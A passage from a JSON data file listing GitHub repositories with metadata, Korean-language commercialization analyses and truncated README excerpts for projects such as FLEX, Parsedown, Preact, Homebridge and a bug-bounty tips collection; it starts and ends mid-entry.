Notice\n各位用户，承蒙各位厚爱，如此小巧的一个工具软件能得到这么多的stars，但因为不可抗力（接口服务器失效），所以此工具已经失去了搜索下载文献的能力，\n在此对各位表示抱歉。\n\n另外，如果有同学能获取到一张首都图书馆的借阅卡（匿名最好），请提交一个issue与我取得联系，我将尽量恢复此软件的功能。\n\n再次感谢大家长久以来的支持，以及对你造成的不便表示抱歉，以上。\n","composite_score":0.083,"license_safety_tag":"unknown"},{"name":"neomatrix369/awesome-ai-ml-dl","github_url":"https://github.com/neomatrix369/awesome-ai-ml-dl","stars":5,"language":"Jupyter Notebook","license":"NOASSERTION","abandonment_months":3,"description":"# awesome-ai-ml-dl 저장소 분석\n\n## 왜 보물인가\n인공지능과 머신러닝을 배우고 싶은 사람들을 위해 세계 최고의 학습 자료들을 한곳에 모아놓은 거대한 안내도입니다.\n\n## 어디에 쓸 수 있나\n\n1. **AI 교육 플랫폼 SaaS**: 이 저장소의 학습 자료를 체계적으로 정렬하여 월 구독식 온라인 교육 플랫폼으로 판매\n2. **기업 직원 교육 ","readme_excerpt":"# Awesome AI-ML-DL [![Awesome](https://awesome.re/badge.svg)](https://awesome.re) [![License: CC BY-SA 4.0](https://img.shields.io/badge/License-CC%20BY--SA%204.0-lightgrey.svg)](https://creativecommons.org/licenses/by-sa/4.0/)\n\nNavigation: [Home](./README.md) · 🗂️ [Reference](./reference/README.md) · ☁️ [Infrastructure](./infrastructure/README.md) · 📓 [Notebooks](./notebooks/README.md) · 🧰 [Tools](./tools/README.md) · 📊 [Data](./data/README.md) · 🤖 [Agents](./ai-agents/README.md) · 🧠 [NLP](./natural-language-processing/README.md)\n\n> Learn, build, and explore AI/ML/DL with curated guides, domains, tools, and examples.\n\n![banner](./assets/banners/portal-hero.png)\n\n## Table of Contents\n\n- [What's new](#whats-new)\n- [Start here](#start-here)\n- [Explore by domain](#explore-by-domain)\n- [Legacy content (full index)](#legacy-content-full-index)\n  - [Python](#python)\n  - [Java & JVM](#java--jvm)\n  - [Other Languages](#other-languages)\n- [AI & Machine Learning](#ai--machine-learning)\n  - [Core","composite_score":0.083,"license_safety_tag":"unknown"},{"name":"Flipboard/FLEX","github_url":"https://github.com/Flipboard/FLEX","stars":5,"language":"Objective-C","license":"bsd-3-clause","abandonment_months":1,"description":"# Flipboard/FLEX 분석 리포트\n\n## 왜 보물인가\niPhone과 iPad 같은 애플 기기의 앱 개발자들이 자신의 앱 내부를 들여다보고 문제를 찾을 수 있게 해주는 강력한 검사 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 앱 개발사들을 위한 온라인 디버깅 플랫폼으로, 개발자가 앱의 숨은 문제를 원격으로 찾고 수정하도록 ","readme_excerpt":"# FLEX\n[![CocoaPods](https://img.shields.io/cocoapods/v/FLEX.svg)](https://cocoapods.org/?q=FLEX)\n [![CocoaPods](https://img.shields.io/cocoapods/l/FLEX.svg)](https://github.com/Flipboard/FLEX/blob/master/LICENSE)\n [![CocoaPods](https://img.shields.io/cocoapods/p/FLEX.svg)]()\n [![Twitter: @ryanolsonk](https://img.shields.io/badge/contact-@ryanolsonk-blue.svg?style=flat)](https://twitter.com/ryanolsonk)\n [![Build Status](https://travis-ci.org/Flipboard/FLEX.svg?branch=master)](https://travis-ci.org/Flipboard/FLEX)\n [![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage)\n\nFLEX (Flipboard Explorer) is a set of in-app debugging and exploration tools for iOS development. When presented, FLEX shows a toolbar that lives in a window above your application. From this toolbar, you can view and modify nearly every piece of state in your running application.\n\n<img alt=\"Demo\" width=36% height=36% src=https://user-images.","composite_score":0.0827,"license_safety_tag":"safe"},{"name":"KingOfBugbounty/KingOfBugBountyTips","github_url":"https://github.com/KingOfBugbounty/KingOfBugBountyTips","stars":6,"language":"Python","license":"unknown","abandonment_months":2,"description":"# KingOfBugBountyTips 분석\n\n## 왜 보물인가\n보안 취약점을 찾아서 상금을 받는 버그바운티 활동에 필요한 실전 팁과 기법들을 정리한 자료집입니다.\n\n## 어디에 쓸 수 있나\n1. **사이버보안 교육 플랫폼**: 버그바운티 입문자 대상 온라인 강좌와 튜토리얼 콘텐츠로 활용\n2. **기업 내부 보안팀 교육**: 직원들을 대상으로 한 보안 인식","readme_excerpt":"<div align=\"center\">\n\n# KingOfBugBountyTips\n\n<img src=\"https://media.giphy.com/media/077i6AULCXc0FKTj9s/giphy.gif\" width=\"500\" alt=\"Tactical Recon\">\n\n**The Ultimate Bug Bounty Reconnaissance Arsenal**\n\n*\"In the shadows we hunt, in the code we trust\"*\n\n---\n\n[![Stars](https://img.shields.io/github/stars/KingOfBugbounty/KingOfBugBountyTips?style=flat-square&color=yellow)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/stargazers)\n[![Forks](https://img.shields.io/github/forks/KingOfBugbounty/KingOfBugBountyTips?style=flat-square&color=blue)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/network/members)\n[![Last Commit](https://img.shields.io/github/last-commit/KingOfBugbounty/KingOfBugBountyTips?style=flat-square&color=green)](https://github.com/KingOfBugbounty/KingOfBugBountyTips/commits/master)\n[![License](https://img.shields.io/github/license/KingOfBugbounty/KingOfBugBountyTips?style=flat-square)](LICENSE)\n\n---\n\n[Telegram](https://t.me/joinchat/DN_iQksIuhyPKJL1gw0ttA) |","composite_score":0.0825,"license_safety_tag":"unknown"},{"name":"mjp66/Ubiquiti","github_url":"https://github.com/mjp66/Ubiquiti","stars":6,"language":"","license":"unknown","abandonment_months":7,"description":"# Ubiquiti 저장소 분석\n\n## 왜 보물인가\nUbiquiti 네트워크 장비를 제어하고 관리하는 도구로, 기업과 개인이 자신의 네트워크를 더 쉽게 운영할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n- **네트워크 관리 SaaS**: 중소기업이 자사 네트워크를 웹에서 직접 모니터링하고 설정할 수 있는 클라우드 서비스\n- **내부 업무 도구**: IT","readme_excerpt":"# Home-Network Implementation\nUsing the Ubiquiti EdgeRouter X and Ubiquiti AP-AC-LR Access Point\n\n","composite_score":0.0823,"license_safety_tag":"unknown"},{"name":"erusev/parsedown","github_url":"https://github.com/erusev/parsedown","stars":5,"language":"PHP","license":"mit","abandonment_months":3,"description":"# Parsedown 저장소 분석\n\n## 왜 보물인가\n마크다운(글을 쉽게 꾸미는 간단한 형식)을 일반 글로 변환하는 핵심 도구로, 블로그·커뮤니티·문서 플랫폼에서 광범위하게 필요합니다.\n\n## 어디에 쓸 수 있나\n\n1. **블로그/뉴스레터 SaaS**: 사용자가 작성한 마크다운 글을 웹페이지로 자동 변환하는 서비스\n2. **문서협업 도구(내부용)**: 팀원","readme_excerpt":"# Parsedown\n\n[![Total Downloads](https://poser.pugx.org/erusev/parsedown/d/total.svg)](https://packagist.org/packages/erusev/parsedown)\n[![Version](https://poser.pugx.org/erusev/parsedown/v/stable.svg)](https://packagist.org/packages/erusev/parsedown)\n[![License](https://poser.pugx.org/erusev/parsedown/license.svg)](https://packagist.org/packages/erusev/parsedown)\n\nBetter Markdown Parser in PHP — <a href=\"https://parsedown.org/demo\">demo</a>\n\n## Features\n\n- One file\n- No dependencies\n- [Super fast](http://parsedown.org/speed)\n- Extensible\n- [GitHub flavored](https://github.github.com/gfm)\n- [Tested](http://parsedown.org/tests/) in PHP 7.1+\n- [Markdown Extra extension](https://github.com/erusev/parsedown-extra)\n\n## Installation\n\nInstall the [composer package]:\n\n```sh\ncomposer require erusev/parsedown\n```\n\nOr download the [latest release] and include `Parsedown.php`\n\n[composer package]: https://packagist.org/packages/erusev/parsedown \"The Parsedown package on packagist.org\"\n[latest relea","composite_score":0.0823,"license_safety_tag":"safe"},{"name":"fossasia/wp-tweeple","github_url":"https://github.com/fossasia/wp-tweeple","stars":11,"language":"C","license":"NOASSERTION","abandonment_months":7,"description":"# wp-tweeple 상업화 분석\n\n## 왜 보물인가\n트위터(X)와 워드프레스를 연결하여 소셜 미디어 콘텐츠를 자동으로 블로그에 활용할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 블로거와 소상공인을 위한 월 구독형 \"자동 소셜 콘텐츠 관리 서비스\"로 제공\n2. **내부 업무 도구**: 대형 미디어사나 출판사의 편집팀이 ","readme_excerpt":"# pslab-mini\n\n## Build Instructions\n\nThis will build the bootloader and the main firmware application. The\nbootloader binary, `pslab-mini-bootloader`, will be located in build/boot/,\nwhile the main firmware application, `pslab-mini-firmware` will be located\nin build/src.\n\n### Prerequisites\n\n- CMake\n- A make tool (e.g., GNU Make or Ninja)\n- `gcc-arm-none-eabi`\n- `libnewlib-arm-none-eabi`\n\n### Steps\n\n```sh\nmkdir build\ncd build\ncmake ..\nmake\n```\n\n## Flashing the Bootloader\n\nFlashing the bootloader requires a hardware programmer, such as ST-Link. The\nNucleo development board has an onboard ST-Link.\n\nTo flash the bootloader using STM32_Programmer_CLI, run:\n\n```sh\nSTM32_Programmer_CLI -c port=SWD -d build/boot/pslab-mini-bootloader.srec -v -rst\n```\n\nTo flash the bootloader using the Windows application of STM32_Programmer, follow these steps:\n\n- Open the STM32_Programmer application and switch to the Erasing & Programming tab from the left menu bar.\n- Connect to the Board using ST-Link and i","composite_score":0.0821,"license_safety_tag":"unknown"},{"name":"Milad-Akarie/auto_route_library","github_url":"https://github.com/Milad-Akarie/auto_route_library","stars":6,"language":"Dart","license":"MIT","abandonment_months":3,"description":"# Auto Route Library 분석\n\n## 왜 보물인가\n앱 개발자들이 복잡한 화면 전환 코드를 자동으로 생성해주는 도구로, 개발 시간을 대폭 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **앱 개발 플랫폼 SaaS**: 노코드/로우코드 앱 빌더에 내장하여 자동 네비게이션 기능 제공\n2. **개발사 내부 도구**: IT 회사의 표준 개발 템플","readme_excerpt":"<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/Milad-Akarie/auto_route_library/master/art/auto_route_logo.svg\" height=\"170\" alt=\"auto_route_logo\">\n</p>\n\n<p align=\"center\">\n  <a href=\"https://img.shields.io/badge/License-MIT-green\">\n    <img src=\"https://img.shields.io/badge/License-MIT-green\" alt=\"MIT License\">\n  </a>\n  <a href=\"https://github.com/Milad-Akarie/auto_route_library/stargazers\">\n    <img src=\"https://img.shields.io/github/stars/Milad-Akarie/auto_route_library?style=flat&logo=github&colorB=green&label=stars\" alt=\"stars\">\n  </a>\n  <a href=\"https://pub.dev/packages/auto_route\">\n    <img src=\"https://img.shields.io/pub/v/auto_route.svg?label=pub&color=orange\" alt=\"pub version\">\n  </a>\n  <a href=\"https://discord.gg/x3SBU4WRRd\">\n    <img src=\"https://img.shields.io/discord/821043906703523850.svg?color=7289da&label=Discord&logo=discord&style=flat-square\" alt=\"Discord Badge\">\n  </a>\n</p>\n\n<p align=\"center\">\n  <a href=\"https://www.buymeacoffee.com/miladakarie\" tar","composite_score":0.082,"license_safety_tag":"safe"},{"name":"AllThingsSmitty/must-watch-javascript","github_url":"https://github.com/AllThingsSmitty/must-watch-javascript","stars":6,"language":"","license":"cc0-1.0","abandonment_months":6,"description":"# must-watch-javascript 분석 보고서\n\n## 왜 보물인가\n웹사이트를 만드는 데 필수적인 자바스크립트 학습 자료를 한곳에 모아놓은 교육용 가이드로, 초보자부터 전문가까지 체계적으로 배울 수 있는 참고서입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 코딩 교육 플랫폼**\n- 유료 구독 회원에게 공식 학습 자료로 제공하여 교육 품질 향상\n","readme_excerpt":"<p align=\"center\">\n  <img src=\"./assets/img/tv.svg\" width=\"200\" alt=\"TV icon with play button\">\n</p>\n\n# Must-Watch JavaScript\n\nThis is a collection of well-received talks about JavaScript covering topics such as React, functional programming, performance, frameworks, debugging, tooling, leveling up, and more.\n\n> [!TIP]\n> **Like CSS? Check out [Must-Watch CSS](https://github.com/AllThingsSmitty/must-watch-css)!** For other great lists check out [@sindresorhus](https://github.com/sindresorhus/)'s curated list of [awesome lists](https://github.com/sindresorhus/awesome/).\n\n- [Contribution Guidelines](CONTRIBUTING.md)\n\n### 2025\n\n1. [**TanStack is Your New Favorite Framework**](https://www.youtube.com/watch?v=uy2WSS1MjGM): Jack Herrington, CascadiaJS `25:49`\n1. [**Learn JavaScript by Building Mario!**](https://www.youtube.com/watch?v=VNs96uQoetw), Ania Kubów, (YouTube Channel) `2:12:04`\n\n### 2024\n\n1. [**Encrypting Data in the Browser - Exploring Web Crypto APIs**](https://www.youtube.com/wat","composite_score":0.0819,"license_safety_tag":"unknown"},{"name":"TauriccResearch/Solana-Trading-Bot","github_url":"https://github.com/TauriccResearch/Solana-Trading-Bot","stars":223,"language":"TypeScript","license":"NOASSERTION","abandonment_months":1,"description":"","readme_excerpt":"","composite_score":0.0818,"license_safety_tag":"unknown"},{"name":"w3c/webcomponents","github_url":"https://github.com/w3c/webcomponents","stars":5,"language":"HTML","license":"NOASSERTION","abandonment_months":6,"description":"# W3C Web Components 저장소 분석\n\n## 왜 보물인가\n웹사이트와 웹 애플리케이션을 만드는 표준 기술을 공식적으로 정의하고 관리하는 W3C의 핵심 저장소로, 전 세계 웹 개발자들이 참고하는 신뢰할 수 있는 기술 문서입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 웹 컴포넌트 기반 UI 라이브러리를 월 구독으로 판매 (디자인 ","readme_excerpt":"# Web Components\n\nWeb Components are a new browser feature that provides a standard component model for the Web, consisting of several pieces maintained in different places:\n\n- Shadow DOM\n    - Most of the parts are now maintained in [DOM Standard](https://dom.spec.whatwg.org/), called shadow trees.\n      Some of the parts are still remained in this repository. See [Issue #661](https://github.com/w3c/webcomponents/issues/661) for the progress of upstreaming those parts from the partially out-of-date [Shadow DOM](https://w3c.github.io/webcomponents/spec/shadow/) document.\n    - [Issues against the DOM and HTML Standard](https://github.com/search?q=org%3Awhatwg+label%3A%22topic%3A+shadow%22+is%3Aopen).\n    - [Issues raised in this repository](https://github.com/w3c/webcomponents/labels/shadow-dom).\n    - [The old issue tracker](https://www.w3.org/Bugs/Public/showdependencytree.cgi?id=14978) on W3C bugzilla, which is no longer used.\n- Custom Elements\n    - Custom elements were upstreamed ","composite_score":0.0816,"license_safety_tag":"unknown"},{"name":"rustdesk/hbb_common","github_url":"https://github.com/rustdesk/hbb_common","stars":100,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.0816,"license_safety_tag":"unknown"},{"name":"mattgodbolt/compiler-explorer","github_url":"https://github.com/mattgodbolt/compiler-explorer","stars":6,"language":"TypeScript","license":"bsd-2-clause","abandonment_months":0,"description":"# Compiler Explorer 상용화 분석\n\n## 왜 보물인가\n프로그래밍 코드가 실제로 어떻게 작동하는지 눈으로 직접 보여주는 도구로, 개발자들의 학습과 최적화에 필수적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 온라인 코딩 교육 플랫폼 (SaaS)**\n프로그래밍 강좌 수강생들이 자신의 코드를 입력하면 결과를 시각적으로 확인할 수 있는 학습","readme_excerpt":"[![Build Status](https://github.com/compiler-explorer/compiler-explorer/workflows/Compiler%20Explorer/badge.svg)](https://github.com/compiler-explorer/compiler-explorer/actions?query=workflow%3A%22Compiler+Explorer%22)\n[![codecov](https://codecov.io/gh/compiler-explorer/compiler-explorer/branch/main/graph/badge.svg)](https://codecov.io/gh/compiler-explorer/compiler-explorer)\n\n[![logo](public/logos/assembly.png)](https://godbolt.org/)\n\n# Compiler Explorer\n\nCompiler Explorer is an interactive compiler exploration website. Edit code in C, C++, C#, F#, Rust, Go, D, Haskell, Swift, Pascal,\n[ispc](https://ispc.github.io/), Python, Java, or any of the other\n[30+ supported languages](https://godbolt.org/api/languages), and see how that code looks after being\ncompiled in real time.\n\n[Bug Report](https://github.com/compiler-explorer/compiler-explorer/issues/new?assignees=&labels=bug&projects=&template=bug_report.yml&title=%5BBUG%5D%3A+)\n·\n[Compiler Request](https://github.com/compiler-explorer/c","composite_score":0.0815,"license_safety_tag":"safe"},{"name":"developit/preact","github_url":"https://github.com/developit/preact","stars":5,"language":"JavaScript","license":"mit","abandonment_months":0,"description":"# Preact 상용화 분석\n\n## 왜 보물인가\n웹사이트를 만드는 데 필요한 가벼운 기초 도구로, 페이스북의 React보다 10배 작아서 빠른 로딩과 저렴한 운영이 가능합니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS - 초저용량 웹 애플리케이션**: 무거운 소프트웨어를 피하는 스타트업을 위한 매우 빠른 협업 도구나 데이터 분석 대시보드\n2. **내부","readme_excerpt":"> [!NOTE]\n> This is the branch for the upcoming release, for patches to v10 you need the [v10.x branch](https://github.com/preactjs/preact/tree/v10.x)\n\n<p align=\"center\">\n<a href=\"https://preactjs.com\" target=\"_blank\">\n\n![Preact](https://raw.githubusercontent.com/preactjs/preact/8b0bcc927995c188eca83cba30fbc83491cc0b2f/logo.svg?sanitize=true 'Preact')\n\n</a>\n</p>\n<p align=\"center\">Fast <b>4kB</b> alternative to React with the same modern API.</p>\n\n**All the power of Virtual DOM components, without the overhead:**\n\n- Familiar React API & patterns: ES6 Class, hooks, and Functional Components\n- Extensive React compatibility via a simple [preact/compat] alias\n- Everything you need: JSX, <abbr title=\"Virtual DOM\">VDOM</abbr>, [DevTools], <abbr title=\"Hot Module Replacement\">HMR</abbr>, <abbr title=\"Server-Side Rendering\">SSR</abbr>.\n- Highly optimized diff algorithm and seamless hydration from Server Side Rendering\n- Supports all modern browsers\n- Transparent asynchronous rendering with a pl","composite_score":0.0814,"license_safety_tag":"safe"},{"name":"cube-js/cube.js","github_url":"https://github.com/cube-js/cube.js","stars":21,"language":"Rust","license":"NOASSERTION","abandonment_months":0,"description":"# Cube.js 저장소 분석\n\n## 왜 보물인가\n복잡한 데이터를 쉽게 시각화하고 분석할 수 있는 도구로, 회사의 경영진이 빠르게 의사결정을 할 수 있게 도와줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객 데이터 분석 플랫폼을 만들어 중소기업들에게 월 구독료로 판매\n2. **내부 업무 도구**: 대기업의 경영진 대시보드를 구축하여 ","readme_excerpt":"![]()\n<p align=\"center\">\n  <a href=\"https://cube.dev?ref=github-readme\"><img src=\"https://raw.githubusercontent.com/cube-js/cube/master/docs/content/cube-core-logo.png\" alt=\"Cube Core — Open-Source Semantic Layer\" width=\"300px\"></a>\n</p>\n<br/>\n\n[Website](https://cube.dev?ref=github-readme) • [Docs](https://cube.dev/docs?ref=github-readme) • [Examples](https://cube.dev/docs/examples?ref=github-readme) • [Blog](https://cube.dev/blog?ref=github-readme) • [Slack](https://slack.cube.dev?ref=github-readme) • [X](https://twitter.com/the_cube_dev)\n\n[![npm version](https://badge.fury.io/js/%40cubejs-backend%2Fserver.svg)](https://badge.fury.io/js/%40cubejs-backend%2Fserver)\n[![GitHub Actions](https://github.com/cube-js/cube/workflows/Build/badge.svg)](https://github.com/cube-js/cube/actions?query=workflow%3ABuild+branch%3Amaster)\n[![FOSSA Status](https://app.fossa.io/api/projects/git%2Bgithub.com%2Fcube-js%2Fcube.js.svg?type=shield)](https://app.fossa.io/projects/git%2Bgithub.com%2Fcube-js%2Fcu","composite_score":0.0811,"license_safety_tag":"unknown"},{"name":"amitshekhariitbhu/Fast-Android-Networking","github_url":"https://github.com/amitshekhariitbhu/Fast-Android-Networking","stars":8,"language":"Java","license":"apache-2.0","abandonment_months":4,"description":"# Fast-Android-Networking 가치 분석\n\n## 왜 보물인가\n안드로이드 앱에서 인터넷 통신을 빠르고 안정적으로 처리할 수 있는 기술로, 앱 개발자들이 반복적으로 작성하던 복잡한 코드를 간단하게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 안드로이드 앱 개발 플랫폼 제공 업체가 이 기술을 통합하여 개발자 온보딩 시간","readme_excerpt":"<img src=https://raw.githubusercontent.com/amitshekhariitbhu/Fast-Android-Networking/master/assets/androidnetworking.png >\n\n# Fast Android Networking Library\n\n### About Fast Android Networking Library\n\nFast Android Networking Library is a powerful library for doing any type of networking in Android applications which is made on top of [OkHttp Networking Layer](http://square.github.io/okhttp/).\n\nFast Android Networking Library takes care of each and everything. So you don't have to do anything, just make request and listen for the response.\n\n### Why use Fast Android Networking ?\n* Recent removal of HttpClient in Android Marshmallow(Android M) made other networking libraries obsolete.\n* No other single library does each and everything like making request, downloading any type of file, uploading file, loading\n  image from network in ImageView, etc. There are some libraries but they are outdated.\n* No other library provides simple interface for doing all types of things in networking like ","composite_score":0.0811,"license_safety_tag":"safe"},{"name":"nfarina/homebridge","github_url":"https://github.com/nfarina/homebridge","stars":12,"language":"TypeScript","license":"apache-2.0","abandonment_months":0,"description":"# Homebridge 저장소 분석\n\n## 왜 보물인가\n집의 여러 스마트 기기들을 한 곳에서 통합적으로 제어할 수 있는 개방형 플랫폼으로, 기술 애호가부터 일반 사용자까지 누구나 스마트홈을 쉽게 구축할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 스마트홈 통합 관리 웹 대시보드 - 월 구독으로 여러 가정의 기기를 원격 관리하","readme_excerpt":"<p align=\"center\">\n  <a href=\"https://homebridge.io\"><img src=\"https://raw.githubusercontent.com/homebridge/branding/latest/logos/homebridge-color-round-stylized.png\" height=\"140\"></a>\n</p>\n\n<span align=\"center\">\n\n# Homebridge\n\n<a href=\"https://www.npmjs.com/package/homebridge\"><img title=\"npm version\" src=\"https://img.shields.io/npm/v/homebridge?label=stable\"></a>\n<a href=\"https://github.com/homebridge/homebridge/wiki/How-To-Change-Homebridge-Version#manage-beta-version\"><img title=\"npm version\" src=\"https://img.shields.io/npm/v/homebridge/beta?label=beta\"></a>\n<a href=\"https://github.com/homebridge/homebridge/wiki/How-To-Change-Homebridge-Version#manage-beta-version\"><img title=\"npm version\" src=\"https://img.shields.io/npm/v/homebridge/alpha?label=alpha\"></a><br>\n<a href=\"https://www.npmjs.com/package/homebridge\"><img title=\"npm downloads\" src=\"https://img.shields.io/npm/dt/homebridge\"></a>\n<a href=\"https://github.com/homebridge/homebridge/actions/workflows/build.yml\"><img title=\"Nod","composite_score":0.0811,"license_safety_tag":"safe"},{"name":"zhujiang521/PlayWeather","github_url":"https://github.com/zhujiang521/PlayWeather","stars":14,"language":"Kotlin","license":"MIT","abandonment_months":4,"description":"# PlayWeather 저장소 분석\n\n## 왜 보물인가\n누구나 간단하게 날씨 정보를 받아볼 수 있는 실용적인 날씨 앱으로, 실제 사람들이 매일 필요로 하는 기능을 담고 있습니다.\n\n## 어디에 쓸 수 있나\n1. **날씨 정보 구독 서비스**: 사용자가 매월 비용을 내고 광고 없는 날씨 알림을 받는 모바일 앱 서비스\n2. **여행사 내부 도구**: 투어 가","readme_excerpt":"# PlayWeather:玩天气\n\n## 我的新书：《Jetpack Compose：Android全新UI编程》已出版\n\n `Compose` 绝对是 Android UI 的未来，声明式的 UI 已经有太多语言试水了，效果都非常好，大家如果喜欢本书的话，可以点击下面的地址进行购买。另外本书的资源文件大家可以去图灵的官网中进行下载。\n\n[京东购买地址](https://item.jd.com/10039809078875.html)\n\n[当当购买地址](http://product.dangdang.com/593507948.html)\n\n[天猫购买地址](https://detail.tmall.com/item.htm?spm=a220m.1000858.1000725.56.6a61b8d7HhFgCX&amp;id=658828404598&amp;areaId=110100&amp;user_id=2145487409&amp;cat_id=2&amp;is_b=1&amp;rn=1522259deab5178ef65819d1ef6b699e)\n\n## 996.ICU 声明\n\n我们坚决反对996工作制（即每日工作时间从早上9点到晚上9点，每周工作6天），并支持健康、可持续的工作与生活平衡。\n\n本项目严格遵守劳动法规定的工作时间，提倡高效、高质量的工作方式，而非通过无休止加班来衡量工作成果。\n\n我们相信：\n- 工作效率比时长更重要\n- 创新来源于合理的工作节奏\n- 每个人都有权利享受生活与工作之外的时间\n\n如果您认同我们的理念，请支持并推广996.ICU运动。\n\n---\n\n*注：996工作制违反《中华人民共和国劳动法》，详见《中华人民共和国劳动合同法》等相关法律法规。*\n\n## 项目简介\n\n之前写过PlayAndroid：玩安卓的Compose版本，但最近在手机上看天气的时候发现一堆广告，烦得要死，自己写一个吧，正好再练练Compose。\n项目中使用到了很多库，都在下方展示了出来，而且自己写的天气绝对没有广告，也不会乱下载东西，也不会胡乱跳别的应用，比如某多多、某宝等等\n使用效果大家可以看下面方的截图，只是想做一个干净的、没有广告、性能好点的天气，没有别的需求。\n如果想只下载apk的话可以去app/release中进行下载，如果想学习项目的编写可以下","composite_score":0.081,"license_safety_tag":"safe"},{"name":"EugenMayer/docker-sync","github_url":"https://github.com/EugenMayer/docker-sync","stars":5,"language":"Ruby","license":"gpl-3.0","abandonment_months":6,"description":"# docker-sync 사업화 분석\n\n## 왜 보물인가\n개발자들이 Mac/Windows에서 Linux 환경으로 파일을 빠르게 동기화하는 작업을 자동화해주는 도구로, 개발 생산성을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 개발환경 서비스**: 클라우드 기반 개발 환경을 제공하는 플랫폼에서 사용자의 로컬 파일을 자동으로 동기화하","readme_excerpt":"[![Gem Version](https://badge.fury.io/rb/docker-sync.svg)](https://badge.fury.io/rb/docker-sync) [![Build Status](https://www.travis-ci.com/EugenMayer/docker-sync.svg?branch=master)](https://www.travis-ci.com/github/EugenMayer/docker-sync) \n\n    Thank you for all the feedback and support i already received!\n    Docker-sync has been improved by all of you in huge ways!\n\nImportant links:\n\n- [Documentation](https://docker-sync.readthedocs.io/en/latest/index.html#)\n- [Official homepage docker-sync.io](http://docker-sync.io)\n\nDocker-sync needs contributions and help\n\n- Help [here](https://github.com/EugenMayer/docker-sync/issues?q=is%3Aissue+is%3Aopen+label%3A%22help+wanted%22) if you are a coder\n- Help [here](https://github.com/EugenMayer/docker-sync/issues?utf8=%E2%9C%93&q=is%3Aissue%20is%3Aopen%20label%3A%22help%20wanted%22%20%20label%3A%22documentation%22%20) with the docs no matter what skill set you have. See the [docs/README.md](docs/README.md) on how to work with the docs.\nMain Cont","composite_score":0.0809,"license_safety_tag":"restricted"},{"name":"fossasia/fossasia-artwork","github_url":"https://github.com/fossasia/fossasia-artwork","stars":11,"language":"","license":"lgpl-2.1","abandonment_months":7,"description":"# FOSSASIA Artwork 저장소 분석\n\n## 왜 보물인가\nFOSSASIA 커뮤니티의 공식 디자인 자산을 중앙집중식으로 관리하여 브랜드 일관성을 유지하면서 누구나 자유롭게 사용할 수 있는 공개 설계 자료실입니다.\n\n## 어디에 쓸 수 있나\n1. **커뮤니티 마케팅 SaaS**: 오픈소스 프로젝트들이 구독하여 자신의 브랜드 가이드와 디자인 자산을 한 ","readme_excerpt":"# FOSSASIA Design and Artwork\n\n## Key Aspects of FOSSASIA's Design:\n\n**Color Palette:** The website primarily uses a white background with \"Rosso Corsa\" (bright red) as an accent color. Shades of gray are also used for text and design elements. This color scheme maintains brand consistency.\n\n**Logo:** The FOSSASIA logo, incorporating the red and white color scheme, is a critical branding element. It should be included and prominently placed in any design materials.\n\n**Typography:** Fonts used include \"Roboto\" and \"Rubik\" or other modern sans-serif fonts like Arial, Helvetica, Verdana, Open Sans, and Lato. Sans-serif fonts do not have the small projecting features known as \"serifs,\" resulting in a clean, modern, and easily readable appearance on screens and at various sizes.\n\n**Visuals and Images:** The website frequently features images related to open-source software, hardware projects, community events, and tech meetups. Design elements should reflect the organization's technological","composite_score":0.0809,"license_safety_tag":"restricted"},{"name":"gotomicro/ego","github_url":"https://github.com/gotomicro/ego","stars":14,"language":"Go","license":"MIT","abandonment_months":4,"description":"# gotomicro/ego 분석\n\n## 왜 보물인가\n작은 규모의 개발 팀이 복잡한 시스템을 쉽게 관리할 수 있도록 도와주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 여러 고객사의 데이터를 안전하게 분리하여 관리하는 다중 사용자 시스템\n2. **내부 업무 도구**: 회사 내부의 복잡한 업무 흐름을 자동화하고 통합하는 플랫폼\n3.","readme_excerpt":"## EGO\n[![All Contributors](https://img.shields.io/badge/All_Contributors-11-orange.svg?style=flat-square)](#contributors-)\n[![Go](https://github.com/gotomicro/ego/workflows/Go/badge.svg?branch=master)](https://github.com/gotomicro/ego/actions)\n[![Go Report Card](https://goreportcard.com/badge/github.com/gotomicro/ego)](https://goreportcard.com/report/github.com/gotomicro/ego)\n[![codecov](https://codecov.io/gh/gotomicro/ego/branch/master/graph/badge.svg)](https://codecov.io/gh/gotomicro/ego)\n[![goproxy.cn](https://goproxy.cn/stats/github.com/gotomicro/ego/badges/download-count.svg)](https://goproxy.cn/stats/github.com/gotomicro/ego)\n[![Release](https://img.shields.io/github/v/release/gotomicro/ego.svg?style=flat-square)](https://github.com/gotomicro/ego)\n[![License: MIT](https://img.shields.io/badge/License-MIT-yellow.svg)](https://opensource.org/licenses/MIT)\n[![Example](https://img.shields.io/badge/Examples-2ca5e0?style=flat&logo=appveyor)](https://github.com/gotomicro/ego/tree/maste","composite_score":0.0806,"license_safety_tag":"safe"},{"name":"nodejitsu/node-http-proxy","github_url":"https://github.com/nodejitsu/node-http-proxy","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":0,"description":"# node-http-proxy 저장소 분석\n\n## 왜 보물인가\n웹 서비스 간 통신을 중개하는 핵심 기술로, 대규모 온라인 서비스의 트래픽 관리와 보안에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **API 게이트웨이 서비스**: 여러 개의 마이크로서비스를 하나의 입구로 통합하여 기업에 제공하는 SaaS\n2. **CDN 및 캐싱 솔루션**: 사용자 요청","readme_excerpt":"<p align=\"center\">\n  <img 